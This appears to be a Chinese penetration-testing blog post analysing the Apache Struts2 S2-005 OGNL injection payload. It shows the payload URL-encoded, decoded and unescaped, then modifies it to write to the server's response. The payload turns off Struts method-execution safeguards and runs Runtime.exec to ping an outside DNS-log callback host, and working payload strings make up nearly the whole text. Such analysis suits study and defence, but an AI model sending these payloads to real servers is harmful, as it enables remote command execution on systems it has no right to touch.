S2-005 payload 分析

原始 payload

(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))


&(asdf)(('%5cu0023rt.exec(%22ping@-c@3@ijtrsivzwnreezte.send.jiance.qianxin.com%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

URLDecode

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Unicode string escape

('#_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&

(aaaa)(
('#context[\'xwork.MethodAccessor.denyMethodExecution\']=#vccc')
(#vccc=new java.lang.Boolean("false"))
)&

(asdf)(
('#rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))')
(#rt=@java.lang.Runtime@getRuntime())
)=1

开始修改

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&
(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&

(aabb)(
('#outstr.close()')
('#outstr.print("888888")')
('#outstr.println("webpath")')
('#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()')
)

修改状态2

(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(aabb)(('\u0023outstr.close()')('\u0023outstr.print("888888")')('\u0023outstr.println("webpath")')('\u0023outstr\u003d@org.apache.struts2.ServletActionContext@getResponse().getWriter()'))=1

• #Penetration Testing